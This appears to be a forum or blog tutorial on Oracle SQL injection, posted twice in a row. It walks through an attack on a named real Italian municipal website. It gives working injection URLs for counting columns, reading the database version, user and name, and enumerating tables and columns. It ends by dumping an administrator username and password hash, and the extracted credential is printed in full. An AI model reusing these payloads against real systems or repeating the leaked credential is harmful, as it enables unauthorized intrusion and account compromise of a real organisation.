Hello guys this is a tutorial about Oracle based SQL injection .
Here is the site to learn with
Let's try order by
look under the picture shit stays like this
Sei in : Home -> Citta' -> Congressi
At order by 7 boom changes
Sei in : Home -> Citta' ->
Then no. of columns=6
Time to use union select
LOLS...Vulnerable column isn't shown..
Let's try all columns
nothing shown wrong column
word congress shown again..This is the right column
change id_categoria to null
version: CORE 9.2.0.6.0 Production
CURRENT USER
Code:
CURRENT DATABASE
output=CSTTA
another methods :
Code:
time to get tables
time to get this table's columns
change with r here too
Retrieving user created tables and columns from user_tab_columns. concat() works but takes only 2 parameters.
54425F414C424F3A444154415F45534543555A494F4E45
convert this hex value to string.
TB_ALBO:DATA_ESECUZIONE
To find the next column of table TB_ALBO
54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE
using > all columns can be retrieved. If any error is generated or query jumps to some other table, then move on to the next table.
MOVING TO NEXT TABLE
54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE
MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO
54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID
EXTRACTING DATA
61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264
administrator:9f21eddc68ef38787fb5ef91991bea2d
Here is the site to learn with
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122
Let's try order by
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1
look under the picture shit stays like this
Sei in : Home -> Citta' -> Congressi
At order by 7 boom changes
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207
Then no. of columns=6
Time to use union select
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null
LOLS...Vulnerable column isn't shown..
Let's try all columns
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version
nothing shown wrong column
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version
word congress shown again..This is the right column
change id_categoria to null
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,banner,null,null,null,null%20from% 20v$version
version: CORE 9.2.0.6.0 Production
CURRENT USER
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--output=WWWTARANTO
CURRENT DATABASE
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--
output=CSTTA
another methods :
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,global_name,NULL,NULL,NULL,NULL from global_name-- -
time to get tables
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null union select null,table_name,null,null,null,null from (select ROWNUM r,table_name from all_tables order by table_name) where r=130This will get table number 130...Change r to get table number
time to get this table's columns
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,column_name,null,null,null,null%20 from%20%28select%20ROWNUM%20r,column_name%20from%20all_tab_columns%20where%20tab le_name=%27RESULT$%27%29%20where%20r=3
change with r here too
Retrieving user created tables and columns from user_tab_columns. concat() works but takes only 2 parameters.
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--
54425F414C424F3A444154415F45534543555A494F4E45
convert this hex value to string.
TB_ALBO:DATA_ESECUZIONE
To find the next column of table TB_ALBO
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--
Code:
CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) = DATA_ESECUZIONE
54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE
using > all columns can be retrieved. If any error is generated or query jumps to some other table, then move on to the next table.
MOVING TO NEXT TABLE
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79)--
54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE
MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) || CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--
54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID
EXTRACTING DATA
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from TB_UTENTE--
61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264
administrator:9f21eddc68ef38787fb5ef91991bea2d
0 comments:
Post a Comment